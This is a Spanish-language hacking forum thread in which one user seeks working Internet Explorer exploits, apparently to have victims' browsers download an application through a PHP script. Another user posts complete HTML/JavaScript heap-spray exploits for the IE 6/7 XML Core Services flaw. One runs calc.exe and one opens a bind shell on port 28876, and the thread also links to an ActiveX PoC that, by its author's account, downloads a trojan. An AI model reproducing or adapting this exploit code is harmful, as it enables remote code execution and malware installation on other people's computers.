 Autor
|
Tema: Exploit XML InternetExplorer [?] (Leído 2,508 veces)
|
akrana
 Desconectado
Mensajes: 36
|
Bueno, estoy buscando exploits actuales para el Internet Explorer, este me parecio muy interesante pero no lo he conseguido hacer funcionar, alguien lo ha probado? XML Parsing Buffer Overflow: http://www.milw0rm.com/exploits/7410Un saludo. |
|
|
|
|
En línea
|
|
|
|
|
kamsky
|
Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
// Heap spray address adjusted for Vista - muts / offensive-security.com se ajusta esto a tu configuración?? tienes los scripts activados?
|
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
akrana
Desconectado
Mensajes: 36
|
Se ajusta perfectamente y tengo los scripts activados...Hay que modificar algo en el exploit? Lo has provado?
Un saludo y gracias por la ayuda!!
|
|
|
|
|
En línea
|
|
|
|
|
kamsky
|
no, no uso explorer ni win :p, debería ir, asegúrate que la versión de wxplorer es la correcta y que no ha sido parcheada
|
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
akrana
Desconectado
Mensajes: 36
|
No necesito exactamente este exploit, pero uno parecido, para el IE, si alguien sabe de exploits funcionales en IE, me haria un gran favir posteandolos...
Un saludo.
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
@akrana
Todos los exploits para IE publicos me han ido bien en Win32/Vista, buscas algo en particular?
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
akrana
Desconectado
Mensajes: 36
|
Bueno, lo que busco son exploits para navegadores, que me permitan descargar una aplicacion. Los quiero para utilizarlos en un script en php que estoy programando. Llevo liado con esto un buen tiempo, pero de momento sigo sin encontrar lo que busco...
Este exploit lo probe hace un tiempo, y no consegui hacerlo funcionar.
Si podemos hablar por MP o msn te lo agradeceria.
Un saludo, akrana.
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Mmmm te sera mas facil explotar algo relacionado con un ActiveX + IE, por aca te dejo un PoC que hice hace tiempo, te podra dar ideas y buenos resultados para lo que investigas, basicamente exploita el ActiveX y descarga algun troyano de alguna URL que especifiques:
Microsoft Access SnapView.ocx remote exploit
:http://foro.elhacker.net/bugs_y_exploits/microsoft_access_snapviewocx_remote_exploit_solucionado-t241945.0.html;msg1163468;topicseen#msg1163468
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
akrana
Desconectado
Mensajes: 36
|
Hola berz3k, lo primero muchas gracias por la info  , me a resultado de gran ayuda, pero lo que estoy buscando son exploits para navegadores. Me puedes pasar tu documentacion sobre esto?? Un saludo y gracias. |
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Te muestro algunos ejemplos para explotar IE 6/7 , recordemos que actualmente estamos en la version 8, pero seguramente algunos users alrededor del mundo siguen usando viejas versiones. MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution ExploitExploit:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
-->
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;
try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};
sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;
obj.open(new Object(),new Object(),new Object(),new Object(), new Object());
obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>
</body></html>
Resultado del exploit ejecucion del calc.exe de forma remota: MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit II, PoC PORTBIND 28876Exploit:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
Proof Of Concept
MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit
A simple "lamme" changes to execute the shellcode and have a portbind on remote
machine in the port 28876, rename this file to PoC.html.
by Alex Hernandez aka alt3kx!
-->
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;
try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};
sh = unescape ("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;
obj.open(new Object(),new Object(),new Object(),new Object(), new Object());
obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>
</body></html>
Como resultado del expoloit obtenemos nuetra shell en escucha PUERTO 28876:  -berz3k. |
|
|
|
« Última modificación: 28 Agosto 2009, 15:59 por berz3k »
|
En línea
|
|
|
|
akrana
Desconectado
Mensajes: 36
|
Muchisimas gracias, me es de gran ayuda!!  Ya te comentare si tengo alguna duda si no te improta. Un saludo, akrana. |
|
|
|
|
En línea
|
|
|
|
|
 |
